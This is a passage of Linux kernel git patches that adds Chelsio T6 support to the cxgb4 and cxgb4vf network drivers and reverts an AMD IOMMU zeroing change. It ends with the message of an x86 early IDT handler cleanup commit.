cpu_to_be32(FW_CMD_OP_V(FW_VI_MAC_CMD) | - FW_CMD_REQUEST_F | FW_CMD_WRITE_F | - (free ? FW_CMD_EXEC_F : 0) | - FW_VI_MAC_CMD_VIID_V(viid)); - c.freemacs_to_len16 = cpu_to_be32(FW_VI_MAC_CMD_FREEMACS_V(free) | - FW_CMD_LEN16_V((naddr + 2) / 2)); - - for (i = 0, p = c.u.exact; i < naddr; i++, p++) { - p->valid_to_idx = - cpu_to_be16(FW_VI_MAC_CMD_VALID_F | - FW_VI_MAC_CMD_IDX_V(FW_VI_MAC_ADD_MAC)); - memcpy(p->macaddr, addr[i], sizeof(p->macaddr)); - } + for (offset = 0; offset < naddr ; /**/) { + unsigned int fw_naddr = (rem < ARRAY_SIZE(c.u.exact) ? + rem : ARRAY_SIZE(c.u.exact)); + size_t len16 = DIV_ROUND_UP(offsetof(struct fw_vi_mac_cmd, + u.exact[fw_naddr]), 16); + struct fw_vi_mac_exact *p; + int i; - ret = t4_wr_mbox_meat(adap, mbox, &c, sizeof(c), &c, sleep_ok); - if (ret) - return ret; + memset(&c, 0, sizeof(c)); + c.op_to_viid = cpu_to_be32(FW_CMD_OP_V(FW_VI_MAC_CMD) | + FW_CMD_REQUEST_F | + FW_CMD_WRITE_F | + FW_CMD_EXEC_V(free) | + FW_VI_MAC_CMD_VIID_V(viid)); + c.freemacs_to_len16 = + cpu_to_be32(FW_VI_MAC_CMD_FREEMACS_V(free) | + FW_CMD_LEN16_V(len16)); + + for (i = 0, p = c.u.exact; i < fw_naddr; i++, p++) { + p->valid_to_idx = + cpu_to_be16(FW_VI_MAC_CMD_VALID_F | + FW_VI_MAC_CMD_IDX_V( + FW_VI_MAC_ADD_MAC)); + memcpy(p->macaddr, addr[offset + i], + sizeof(p->macaddr)); + } - for (i = 0, p = c.u.exact; i < naddr; i++, p++) { - u16 index = FW_VI_MAC_CMD_IDX_G(be16_to_cpu(p->valid_to_idx)); + /* It's okay if we run out of space in our MAC address arena. + * Some of the addresses we submit may get stored so we need + * to run through the reply to see what the results were ... + */ + ret = t4_wr_mbox_meat(adap, mbox, &c, sizeof(c), &c, sleep_ok); + if (ret && ret != -FW_ENOMEM) + break; - if (idx) - idx[i] = index >= max_naddr ? 0xffff : index; - if (index < max_naddr) - ret++; - else if (hash) - *hash |= (1ULL << hash_mac_addr(addr[i])); + for (i = 0, p = c.u.exact; i < fw_naddr; i++, p++) { + u16 index = FW_VI_MAC_CMD_IDX_G( + be16_to_cpu(p->valid_to_idx)); + + if (idx) + idx[offset + i] = (index >= max_naddr ? + 0xffff : index); + if (index < max_naddr) + nfilters++; + else if (hash) + *hash |= (1ULL << + hash_mac_addr(addr[offset + i])); + } + + free = false; + offset += fw_naddr; + rem -= fw_naddr; } + + if (ret == 0 || ret == -FW_ENOMEM) + ret = nfilters; return ret; } @@ -5209,9 +5296,7 @@ int t4_change_mac(struct adapter *adap, unsigned int mbox, unsigned int viid, int ret, mode; struct fw_vi_mac_cmd c; struct fw_vi_mac_exact *p = c.u.exact; - unsigned int max_mac_addr = is_t4(adap->params.chip) ? - NUM_MPS_CLS_SRAM_L_INSTANCES : - NUM_MPS_T5_CLS_SRAM_L_INSTANCES; + unsigned int max_mac_addr = adap->params.arch.mps_tcam_size; if (idx < 0) /* new allocation */ idx = persist ? FW_VI_MAC_ADD_PERSIST_MAC : FW_VI_MAC_ADD_MAC; @@ -5620,9 +5705,30 @@ int t4_prep_adapter(struct adapter *adapter) switch (ver) { case CHELSIO_T4: adapter->params.chip |= CHELSIO_CHIP_CODE(CHELSIO_T4, pl_rev); + adapter->params.arch.sge_fl_db = DBPRIO_F; + adapter->params.arch.mps_tcam_size = + NUM_MPS_CLS_SRAM_L_INSTANCES; + adapter->params.arch.mps_rplc_size = 128; + adapter->params.arch.nchan = NCHAN; + adapter->params.arch.vfcount = 128; break; case CHELSIO_T5: adapter->params.chip |= CHELSIO_CHIP_CODE(CHELSIO_T5, pl_rev); + adapter->params.arch.sge_fl_db = DBPRIO_F | DBTYPE_F; + adapter->params.arch.mps_tcam_size = + NUM_MPS_T5_CLS_SRAM_L_INSTANCES; + adapter->params.arch.mps_rplc_size = 128; + adapter->params.arch.nchan = NCHAN; + adapter->params.arch.vfcount = 128; + break; + case CHELSIO_T6: + adapter->params.chip |= CHELSIO_CHIP_CODE(CHELSIO_T6, pl_rev); + adapter->params.arch.sge_fl_db = 0; + adapter->params.arch.mps_tcam_size = + NUM_MPS_T5_CLS_SRAM_L_INSTANCES; + adapter->params.arch.mps_rplc_size = 256; + adapter->params.arch.nchan = 2; + adapter->params.arch.vfcount = 256; break; default: dev_err(adapter->pdev_dev, "Device %d is not supported\n", diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_msg.h b/drivers/net/ethernet/chelsio/cxgb4/t4_msg.h index d90f8a03e378..132cb8fc0bf7 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_msg.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_msg.h @@ -686,6 +686,9 @@ struct cpl_tx_pkt { #define TXPKT_ETHHDR_LEN_S 34 #define TXPKT_ETHHDR_LEN_V(x) ((__u64)(x) << TXPKT_ETHHDR_LEN_S) +#define T6_TXPKT_ETHHDR_LEN_S 32 +#define T6_TXPKT_ETHHDR_LEN_V(x) ((__u64)(x) << T6_TXPKT_ETHHDR_LEN_S) + #define TXPKT_CSUM_TYPE_S 40 #define TXPKT_CSUM_TYPE_V(x) ((__u64)(x) << TXPKT_CSUM_TYPE_S) diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h b/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h index 326674b19983..c7fc3d3068f9 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h @@ -418,6 +418,20 @@ #define SGE_INGRESS_QUEUES_PER_PAGE_PF_A 0x10f4 #define SGE_INGRESS_QUEUES_PER_PAGE_VF_A 0x10f8 +#define SGE_ERROR_STATS_A 0x1100 + +#define UNCAPTURED_ERROR_S 18 +#define UNCAPTURED_ERROR_V(x) ((x) << UNCAPTURED_ERROR_S) +#define UNCAPTURED_ERROR_F UNCAPTURED_ERROR_V(1U) + +#define ERROR_QID_VALID_S 17 +#define ERROR_QID_VALID_V(x) ((x) << ERROR_QID_VALID_S) +#define ERROR_QID_VALID_F ERROR_QID_VALID_V(1U) + +#define ERROR_QID_S 0 +#define ERROR_QID_M 0x1ffffU +#define ERROR_QID_G(x) (((x) >> ERROR_QID_S) & ERROR_QID_M) + #define HP_INT_THRESH_S 28 #define HP_INT_THRESH_M 0xfU #define HP_INT_THRESH_V(x) ((x) << HP_INT_THRESH_S) @@ -705,6 +719,10 @@ #define REGISTER_S 0 #define REGISTER_V(x) ((x) << REGISTER_S) +#define T6_ENABLE_S 31 +#define T6_ENABLE_V(x) ((x) << T6_ENABLE_S) +#define T6_ENABLE_F T6_ENABLE_V(1U) + #define PFNUM_S 0 #define PFNUM_V(x) ((x) << PFNUM_S) @@ -2054,6 +2072,11 @@ #define VFLKPIDX_M 0xffU #define VFLKPIDX_G(x) (((x) >> VFLKPIDX_S) & VFLKPIDX_M) +#define T6_VFWRADDR_S 8 +#define T6_VFWRADDR_M 0xffU +#define T6_VFWRADDR_V(x) ((x) << T6_VFWRADDR_S) +#define T6_VFWRADDR_G(x) (((x) >> T6_VFWRADDR_S) & T6_VFWRADDR_M) + #define TP_RSS_CONFIG_CNG_A 0x7e04 #define TP_RSS_SECRET_KEY0_A 0x40 #define TP_RSS_PF0_CONFIG_A 0x30 @@ -2175,7 +2198,28 @@ #define MPS_RX_PERR_INT_CAUSE_A 0x11074 #define MPS_CLS_TCAM_Y_L_A 0xf000 +#define MPS_CLS_TCAM_DATA0_A 0xf000 +#define MPS_CLS_TCAM_DATA1_A 0xf004 + +#define DMACH_S 0 +#define DMACH_M 0xffffU +#define DMACH_G(x) (((x) >> DMACH_S) & DMACH_M) + #define MPS_CLS_TCAM_X_L_A 0xf008 +#define MPS_CLS_TCAM_DATA2_CTL_A 0xf008 + +#define CTLCMDTYPE_S 31 +#define CTLCMDTYPE_V(x) ((x) << CTLCMDTYPE_S) +#define CTLCMDTYPE_F CTLCMDTYPE_V(1U) + +#define CTLTCAMSEL_S 25 +#define CTLTCAMSEL_V(x) ((x) << CTLTCAMSEL_S) + +#define CTLTCAMINDEX_S 17 +#define CTLTCAMINDEX_V(x) ((x) << CTLTCAMINDEX_S) + +#define CTLXYBITSEL_S 16 +#define CTLXYBITSEL_V(x) ((x) << CTLXYBITSEL_S) #define MPS_CLS_TCAM_Y_L(idx) (MPS_CLS_TCAM_Y_L_A + (idx) * 16) #define NUM_MPS_CLS_TCAM_Y_L_INSTANCES 512 @@ -2184,6 +2228,45 @@ #define NUM_MPS_CLS_TCAM_X_L_INSTANCES 512 #define MPS_CLS_SRAM_L_A 0xe000 + +#define T6_MULTILISTEN0_S 26 + +#define T6_SRAM_PRIO3_S 23 +#define T6_SRAM_PRIO3_M 0x7U +#define T6_SRAM_PRIO3_G(x) (((x) >> T6_SRAM_PRIO3_S) & T6_SRAM_PRIO3_M) + +#define T6_SRAM_PRIO2_S 20 +#define T6_SRAM_PRIO2_M 0x7U +#define T6_SRAM_PRIO2_G(x) (((x) >> T6_SRAM_PRIO2_S) & T6_SRAM_PRIO2_M) + +#define T6_SRAM_PRIO1_S 17 +#define T6_SRAM_PRIO1_M 0x7U +#define T6_SRAM_PRIO1_G(x) (((x) >> T6_SRAM_PRIO1_S) & T6_SRAM_PRIO1_M) + +#define T6_SRAM_PRIO0_S 14 +#define T6_SRAM_PRIO0_M 0x7U +#define T6_SRAM_PRIO0_G(x) (((x) >> T6_SRAM_PRIO0_S) & T6_SRAM_PRIO0_M) + +#define T6_SRAM_VLD_S 13 +#define T6_SRAM_VLD_V(x) ((x) << T6_SRAM_VLD_S) +#define T6_SRAM_VLD_F T6_SRAM_VLD_V(1U) + +#define T6_REPLICATE_S 12 +#define T6_REPLICATE_V(x) ((x) << T6_REPLICATE_S) +#define T6_REPLICATE_F T6_REPLICATE_V(1U) + +#define T6_PF_S 9 +#define T6_PF_M 0x7U +#define T6_PF_G(x) (((x) >> T6_PF_S) & T6_PF_M) + +#define T6_VF_VALID_S 8 +#define T6_VF_VALID_V(x) ((x) << T6_VF_VALID_S) +#define T6_VF_VALID_F T6_VF_VALID_V(1U) + +#define T6_VF_S 0 +#define T6_VF_M 0xffU +#define T6_VF_G(x) (((x) >> T6_VF_S) & T6_VF_M) + #define MPS_CLS_SRAM_H_A 0xe004 #define MPS_CLS_SRAM_L(idx) (MPS_CLS_SRAM_L_A + (idx) * 8) @@ -2433,6 +2516,8 @@ #define CIM_F CIM_V(1U) #define MC1_S 31 +#define MC1_V(x) ((x) << MC1_S) +#define MC1_F MC1_V(1U) #define PL_INT_ENABLE_A 0x19410 #define PL_INT_MAP0_A 0x19414 @@ -2463,6 +2548,18 @@ #define REV_V(x) ((x) << REV_S) #define REV_G(x) (((x) >> REV_S) & REV_M) +#define T6_UNKNOWNCMD_S 3 +#define T6_UNKNOWNCMD_V(x) ((x) << T6_UNKNOWNCMD_S) +#define T6_UNKNOWNCMD_F T6_UNKNOWNCMD_V(1U) + +#define T6_LIP0_S 2 +#define T6_LIP0_V(x) ((x) << T6_LIP0_S) +#define T6_LIP0_F T6_LIP0_V(1U) + +#define T6_LIPMISS_S 1 +#define T6_LIPMISS_V(x) ((x) << T6_LIPMISS_S) +#define T6_LIPMISS_F T6_LIPMISS_V(1U) + #define LE_DB_INT_CAUSE_A 0x19c3c #define REQQPARERR_S 16 @@ -2485,6 +2582,14 @@ #define LIP0_V(x) ((x) << LIP0_S) #define LIP0_F LIP0_V(1U) +#define TCAMINTPERR_S 13 +#define TCAMINTPERR_V(x) ((x) << TCAMINTPERR_S) +#define TCAMINTPERR_F TCAMINTPERR_V(1U) + +#define SSRAMINTPERR_S 10 +#define SSRAMINTPERR_V(x) ((x) << SSRAMINTPERR_S) +#define SSRAMINTPERR_F SSRAMINTPERR_V(1U) + #define NCSI_INT_CAUSE_A 0x1a0d8 #define CIM_DM_PRTY_ERR_S 8 diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_values.h b/drivers/net/ethernet/chelsio/cxgb4/t4_values.h index 72ec1f91d29f..7bdee3bf75ec 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_values.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_values.h @@ -63,6 +63,7 @@ #define FETCHBURSTMIN_64B_X 2 +#define FETCHBURSTMAX_256B_X 2 #define FETCHBURSTMAX_512B_X 3 #define HOSTFCMODE_STATUS_PAGE_X 2 diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h b/drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h index 0848317e5c4f..aceb1e8cacc8 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h @@ -788,15 +788,27 @@ struct fw_ldst_cmd { __be16 vctl; __be16 rval; } mdio; - struct fw_ldst_mps { - __be16 fid_ctl; - __be16 rplcpf_pkd; - __be32 rplc127_96; - __be32 rplc95_64; - __be32 rplc63_32; - __be32 rplc31_0; - __be32 atrb; - __be16 vlan[16]; + union fw_ldst_mps { + struct fw_ldst_mps_rplc { + __be16 fid_idx; + __be16 rplcpf_pkd; + __be32 rplc255_224; + __be32 rplc223_192; + __be32 rplc191_160; + __be32 rplc159_128; + __be32 rplc127_96; + __be32 rplc95_64; + __be32 rplc63_32; + __be32 rplc31_0; + } rplc; + struct fw_ldst_mps_atrb { + __be16 fid_mpsid; + __be16 r2[3]; + __be32 r3[2]; + __be32 r4; + __be32 atrb; + __be16 vlan[16]; + } atrb; } mps; struct fw_ldst_func { u8 access_ctl; @@ -831,8 +843,8 @@ struct fw_ldst_cmd { #define FW_LDST_CMD_FID_S 15 #define FW_LDST_CMD_FID_V(x) ((x) << FW_LDST_CMD_FID_S) -#define FW_LDST_CMD_CTL_S 0 -#define FW_LDST_CMD_CTL_V(x) ((x) << FW_LDST_CMD_CTL_S) +#define FW_LDST_CMD_IDX_S 0 +#define FW_LDST_CMD_IDX_V(x) ((x) << FW_LDST_CMD_IDX_S) #define FW_LDST_CMD_RPLCPF_S 0 #define FW_LDST_CMD_RPLCPF_V(x) ((x) << FW_LDST_CMD_RPLCPF_S) @@ -2536,13 +2548,8 @@ enum fw_port_mod_sub_type { FW_PORT_MOD_SUB_TYPE_TWINAX_7 = 0xC, }; -/* port stats */ -#define FW_NUM_PORT_STATS 50 -#define FW_NUM_PORT_TX_STATS 23 -#define FW_NUM_PORT_RX_STATS 27 - enum fw_port_stats_tx_index { - FW_STAT_TX_PORT_BYTES_IX, + FW_STAT_TX_PORT_BYTES_IX = 0, FW_STAT_TX_PORT_FRAMES_IX, FW_STAT_TX_PORT_BCAST_IX, FW_STAT_TX_PORT_MCAST_IX, @@ -2564,11 +2571,12 @@ enum fw_port_stats_tx_index { FW_STAT_TX_PORT_PPP4_IX, FW_STAT_TX_PORT_PPP5_IX, FW_STAT_TX_PORT_PPP6_IX, - FW_STAT_TX_PORT_PPP7_IX + FW_STAT_TX_PORT_PPP7_IX, + FW_NUM_PORT_TX_STATS }; enum fw_port_stat_rx_index { - FW_STAT_RX_PORT_BYTES_IX, + FW_STAT_RX_PORT_BYTES_IX = 0, FW_STAT_RX_PORT_FRAMES_IX, FW_STAT_RX_PORT_BCAST_IX, FW_STAT_RX_PORT_MCAST_IX, @@ -2594,9 +2602,14 @@ enum fw_port_stat_rx_index { FW_STAT_RX_PORT_PPP5_IX, FW_STAT_RX_PORT_PPP6_IX, FW_STAT_RX_PORT_PPP7_IX, - FW_STAT_RX_PORT_LESS_64B_IX + FW_STAT_RX_PORT_LESS_64B_IX, + FW_STAT_RX_PORT_MAC_ERROR_IX, + FW_NUM_PORT_RX_STATS }; +/* port stats */ +#define FW_NUM_PORT_STATS (FW_NUM_PORT_TX_STATS + FW_NUM_PORT_RX_STATS) + struct fw_port_stats_cmd { __be32 op_to_portid; __be32 retval_len16; @@ -3025,7 +3038,8 @@ struct fw_hdr { enum fw_hdr_chip { FW_HDR_CHIP_T4, - FW_HDR_CHIP_T5 + FW_HDR_CHIP_T5, + FW_HDR_CHIP_T6 }; #define FW_HDR_FW_VER_MAJOR_S 24 diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4fw_version.h b/drivers/net/ethernet/chelsio/cxgb4/t4fw_version.h index b9d1cbac0eee..32b213559b02 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4fw_version.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4fw_version.h @@ -45,4 +45,9 @@ #define T5FW_VERSION_MICRO 0x20 #define T5FW_VERSION_BUILD 0x00 +#define T6FW_VERSION_MAJOR 0x01 +#define T6FW_VERSION_MINOR 0x0D +#define T6FW_VERSION_MICRO 0x2D +#define T6FW_VERSION_BUILD 0x00 + #endif From 41fc2e41d348a7bca768815adf033bbf00de220f Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Tue, 2 Jun 2015 13:59:40 +0530 Subject: [PATCH 580/872] cxgb4vf: Adds SRIOV driver changes for T6 adapter Adds vnic driver register related changes for T6 adapter Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4vf/sge.c | 45 ++++++++++++------- .../ethernet/chelsio/cxgb4vf/t4vf_common.h | 8 ++++ .../net/ethernet/chelsio/cxgb4vf/t4vf_hw.c | 24 +++++++--- 3 files changed, 54 insertions(+), 23 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4vf/sge.c b/drivers/net/ethernet/chelsio/cxgb4vf/sge.c index be4ab09d11d7..ad53e5ad2acd 100644 --- a/drivers/net/ethernet/chelsio/cxgb4vf/sge.c +++ b/drivers/net/ethernet/chelsio/cxgb4vf/sge.c @@ -524,7 +524,7 @@ static void unmap_rx_buf(struct adapter *adapter, struct sge_fl *fl) */ static inline void ring_fl_db(struct adapter *adapter, struct sge_fl *fl) { - u32 val; + u32 val = adapter->params.arch.sge_fl_db; /* The SGE keeps track of its Producer and Consumer Indices in terms * of Egress Queue Units so we can only tell it about integral numbers @@ -532,11 +532,9 @@ static inline void ring_fl_db(struct adapter *adapter, struct sge_fl *fl) */ if (fl->pend_cred >= FL_PER_EQ_UNIT) { if (is_t4(adapter->params.chip)) - val = PIDX_V(fl->pend_cred / FL_PER_EQ_UNIT); + val |= PIDX_V(fl->pend_cred / FL_PER_EQ_UNIT); else - val = PIDX_T5_V(fl->pend_cred / FL_PER_EQ_UNIT) | - DBTYPE_F; - val |= DBPRIO_F; + val |= PIDX_T5_V(fl->pend_cred / FL_PER_EQ_UNIT); /* Make sure all memory writes to the Free List queue are * committed before we tell the hardware about them. @@ -1084,7 +1082,7 @@ static void inline_tx_skb(const struct sk_buff *skb, const struct sge_txq *tq, * Figure out what HW csum a packet wants and return the appropriate control * bits. */ -static u64 hwcsum(const struct sk_buff *skb) +static u64 hwcsum(enum chip_type chip, const struct sk_buff *skb) { int csum_type; const struct iphdr *iph = ip_hdr(skb); @@ -1116,11 +1114,16 @@ static u64 hwcsum(const struct sk_buff *skb) goto nocsum; } - if (likely(csum_type >= TX_CSUM_TCPIP)) - return TXPKT_CSUM_TYPE_V(csum_type) | - TXPKT_IPHDR_LEN_V(skb_network_header_len(skb)) | - TXPKT_ETHHDR_LEN_V(skb_network_offset(skb) - ETH_HLEN); - else { + if (likely(csum_type >= TX_CSUM_TCPIP)) { + u64 hdr_len = TXPKT_IPHDR_LEN_V(skb_network_header_len(skb)); + int eth_hdr_len = skb_network_offset(skb) - ETH_HLEN; + + if (chip <= CHELSIO_T5) + hdr_len |= TXPKT_ETHHDR_LEN_V(eth_hdr_len); + else + hdr_len |= T6_TXPKT_ETHHDR_LEN_V(eth_hdr_len); + return TXPKT_CSUM_TYPE_V(csum_type) | hdr_len; + } else { int start = skb_transport_offset(skb); return TXPKT_CSUM_TYPE_V(csum_type) | @@ -1308,10 +1311,15 @@ int t4vf_eth_xmit(struct sk_buff *skb, struct net_device *dev) * accounting. */ cpl = (void *)(lso + 1); - cntrl = (TXPKT_CSUM_TYPE_V(v6 ? + + if (CHELSIO_CHIP_VERSION(adapter->params.chip) <= CHELSIO_T5) + cntrl = TXPKT_ETHHDR_LEN_V(eth_xtra_len); + else + cntrl = T6_TXPKT_ETHHDR_LEN_V(eth_xtra_len); + + cntrl |= TXPKT_CSUM_TYPE_V(v6 ? TX_CSUM_TCPIP6 : TX_CSUM_TCPIP) | - TXPKT_IPHDR_LEN_V(l3hdr_len) | - TXPKT_ETHHDR_LEN_V(eth_xtra_len)); + TXPKT_IPHDR_LEN_V(l3hdr_len); txq->tso++; txq->tx_cso += ssi->gso_segs; } else { @@ -1328,7 +1336,8 @@ int t4vf_eth_xmit(struct sk_buff *skb, struct net_device *dev) */ cpl = (void *)(wr + 1); if (skb->ip_summed == CHECKSUM_PARTIAL) { - cntrl = hwcsum(skb) | TXPKT_IPCSUM_DIS_F; + cntrl = hwcsum(adapter->params.chip, skb) | + TXPKT_IPCSUM_DIS_F; txq->tx_cso++; } else cntrl = TXPKT_L4CSUM_DIS_F | TXPKT_IPCSUM_DIS_F; @@ -2247,6 +2256,8 @@ int t4vf_sge_alloc_rxq(struct adapter *adapter, struct sge_rspq *rspq, cmd.iqaddr = cpu_to_be64(rspq->phys_addr); if (fl) { + enum chip_type chip = + CHELSIO_CHIP_VERSION(adapter->params.chip); /* * Allocate the ring for the hardware free list (with space * for its status page) along with the associated software @@ -2286,7 +2297,9 @@ int t4vf_sge_alloc_rxq(struct adapter *adapter, struct sge_rspq *rspq, cmd.fl0dcaen_to_fl0cidxfthresh = cpu_to_be16( FW_IQ_CMD_FL0FBMIN_V(SGE_FETCHBURSTMIN_64B) | - FW_IQ_CMD_FL0FBMAX_V(SGE_FETCHBURSTMAX_512B)); + FW_IQ_CMD_FL0FBMAX_V((chip <= CHELSIO_T5) ? + FETCHBURSTMAX_512B_X : + FETCHBURSTMAX_256B_X)); cmd.fl0size = cpu_to_be16(flsz); cmd.fl0addr = cpu_to_be64(fl->addr); } diff --git a/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_common.h b/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_common.h index 75df25970d5e..88b8981b4751 100644 --- a/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_common.h +++ b/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_common.h @@ -51,6 +51,7 @@ */ #define CHELSIO_T4 0x4 #define CHELSIO_T5 0x5 +#define CHELSIO_T6 0x6 enum chip_type { T4_A1 = CHELSIO_CHIP_CODE(CHELSIO_T4, 1), @@ -156,6 +157,12 @@ struct vpd_params { u32 cclk; /* Core Clock (KHz) */ }; +/* Stores chip specific parameters */ +struct arch_specific_params { + u32 sge_fl_db; + u16 mps_tcam_size; +}; + /* * Global Receive Side Scaling (RSS) parameters in host-native format. */ @@ -215,6 +222,7 @@ struct adapter_params { struct vpd_params vpd; /* Vital Product Data */ struct rss_params rss; /* Receive Side Scaling */ struct vf_resources vfres; /* Virtual Function Resource limits */ + struct arch_specific_params arch; /* chip specific params */ enum chip_type chip; /* chip code */ u8 nports; /* # of Ethernet "ports" */ }; diff --git a/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_hw.c b/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_hw.c index 135909ecbc0f..0db6dc9e9ed2 100644 --- a/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_hw.c @@ -1191,9 +1191,7 @@ int t4vf_alloc_mac_filt(struct adapter *adapter, unsigned int viid, bool free, unsigned nfilters = 0; unsigned int rem = naddr; struct fw_vi_mac_cmd cmd, rpl; - unsigned int max_naddr = is_t4(adapter->params.chip) ? - NUM_MPS_CLS_SRAM_L_INSTANCES : - NUM_MPS_T5_CLS_SRAM_L_INSTANCES; + unsigned int max_naddr = adapter->params.arch.mps_tcam_size; if (naddr > max_naddr) return -EINVAL; @@ -1285,9 +1283,7 @@ int t4vf_change_mac(struct adapter *adapter, unsigned int viid, struct fw_vi_mac_exact *p = &cmd.u.exact[0]; size_t len16 = DIV_ROUND_UP(offsetof(struct fw_vi_mac_cmd, u.exact[1]), 16); - unsigned int max_naddr = is_t4(adapter->params.chip) ? - NUM_MPS_CLS_SRAM_L_INSTANCES : - NUM_MPS_T5_CLS_SRAM_L_INSTANCES; + unsigned int max_mac_addr = adapter->params.arch.mps_tcam_size; /* * If this is a new allocation, determine whether it should be @@ -1310,7 +1306,7 @@ int t4vf_change_mac(struct adapter *adapter, unsigned int viid, if (ret == 0) { p = &rpl.u.exact[0]; ret = FW_VI_MAC_CMD_IDX_G(be16_to_cpu(p->valid_to_idx)); - if (ret >= max_naddr) + if (ret >= max_mac_addr) ret = -ENOMEM; } return ret; @@ -1590,11 +1586,25 @@ int t4vf_prep_adapter(struct adapter *adapter) switch (CHELSIO_PCI_ID_VER(adapter->pdev->device)) { case CHELSIO_T4: adapter->params.chip |= CHELSIO_CHIP_CODE(CHELSIO_T4, 0); + adapter->params.arch.sge_fl_db = DBPRIO_F; + adapter->params.arch.mps_tcam_size = + NUM_MPS_CLS_SRAM_L_INSTANCES; break; case CHELSIO_T5: chipid = REV_G(t4_read_reg(adapter, PL_VF_REV_A)); adapter->params.chip |= CHELSIO_CHIP_CODE(CHELSIO_T5, chipid); + adapter->params.arch.sge_fl_db = DBPRIO_F | DBTYPE_F; + adapter->params.arch.mps_tcam_size = + NUM_MPS_T5_CLS_SRAM_L_INSTANCES; + break; + + case CHELSIO_T6: + chipid = REV_G(t4_read_reg(adapter, PL_VF_REV_A)); + adapter->params.chip |= CHELSIO_CHIP_CODE(CHELSIO_T6, chipid); + adapter->params.arch.sge_fl_db = 0; + adapter->params.arch.mps_tcam_size = + NUM_MPS_T5_CLS_SRAM_L_INSTANCES; break; } From 2d0ec7a19b5796aa958636eeeff072b506460501 Mon Sep 17 00:00:00 2001 From: Joerg Roedel Date: Mon, 1 Jun 2015 17:30:57 +0200 Subject: [PATCH 581/872] Revert "iommu/amd: Don't allocate with __GFP_ZERO in alloc_coherent" This reverts commit 5fc872c7323534e8f7dc21bab635e7a9b9659e07. The DMA-API does not strictly require that the memory returned by dma_alloc_coherent is zeroed out. For that another function (dma_zalloc_coherent) should be used. But all other x86 DMA-API implementation I checked zero out the memory, so that some drivers rely on it and break when it is not. It seems the (driver-)world is not yet ready for this change, so revert it. Signed-off-by: Joerg Roedel --- drivers/iommu/amd_iommu.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/iommu/amd_iommu.c b/drivers/iommu/amd_iommu.c index e43d48956dea..e1c7e9e51045 100644 --- a/drivers/iommu/amd_iommu.c +++ b/drivers/iommu/amd_iommu.c @@ -2930,6 +2930,7 @@ static void *alloc_coherent(struct device *dev, size_t size, size = PAGE_ALIGN(size); dma_mask = dev->coherent_dma_mask; flag &= ~(__GFP_DMA | __GFP_HIGHMEM | __GFP_DMA32); + flag |= __GFP_ZERO; page = alloc_pages(flag | __GFP_NOWARN, get_order(size)); if (!page) { From 425be5679fd292a3c36cb1fe423086708a99f11a Mon Sep 17 00:00:00 2001 From: Andy Lutomirski Date: Fri, 22 May 2015 16:15:47 -0700 Subject: [PATCH 582/872] x86/asm/irq: Stop relying on magic JMP behavior for early_idt_handlers The early_idt_handlers asm code generates an array of entry points spaced nine bytes apart. It's not really clear from that code or from the places that reference it what's going on, and the code only works in the first place because GAS never generates two-byte JMP instructions when jumping to global labels. Clean up the code to generate the correct array stride (member size) explicitly. This should be considerably more robust against screw-ups, as GAS will warn if a .fill directive has a negative count. Using '. =' to advance would have been even more robust (it would generate an actual error if it tried to move backwards), but it would pad with nulls, confusing anyone who tries to disassemble the code. The new scheme should be much clearer to future readers. While we're at it, improve the comments and rename the array and common code. Binutils may start relaxing jumps to non-weak labels. If so, this change will fix our build, and we may need to backport this change. Before, on x86_64: 0000000000000000 : 0: 6a 00 pushq $0x0 2: 6a 00 pushq $0x0 4: e9 00 00 00 00 jmpq 9 5: R_X86_64_PC32 early_idt_handler-0x4 ... 48: 66 90 xchg %ax,%ax 4a: 6a 08 pushq $0x8 4c: e9 00 00 00 00 jmpq 51 4d: R_X86_64_PC32 early_idt_handler-0x4 ... 117: 6a 00 pushq $0x0 119: 6a 1f pushq $0x1f 11b: e9 00 00 00 00 jmpq 120 11c: R_X86_64_PC32 early_idt_handler-0x4 After: 0000000000000000 : 0: 6a 00 pushq $0x0 2: 6a 00 pushq $0x0 4: e9 14 01 00 00 jmpq 11d ... 48: 6a 08 pushq $0x8 4a: e9 d1 00 00 00 jmpq 120 4f: cc int3 50: cc int3 ... 117: 6a 00 pushq $0x0 119: 6a 1f pushq $0x1f 11b: eb 03 jmp 120 11d: cc int3 11e: cc int3 11f: cc int3 Signed-off-by: Andy Lutomirski Acked-by: H. Peter Anvin Cc: Binutils Cc: Borislav Petkov Cc: H.J. Lu Cc: Jan Beulich Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: Link: http://lkml.kernel.org/r/ac027962af343b0c599cbfcf50b945ad2ef3d7a8.1432336324.git.luto@kernel.org Signed-off-by: Ingo Molnar --- arch/x86/include/asm/segment.h | 14 ++++++++++++-- arch/x86/kernel/head64.c | 2 +- arch/x86/kernel/head_32.S | 33 ++++++++++++++++++--------------- arch/x86/kernel/head_64.S | 20 +++++++++++--------- 4 files changed, 42 insertions(+), 27 deletions(-) diff --git 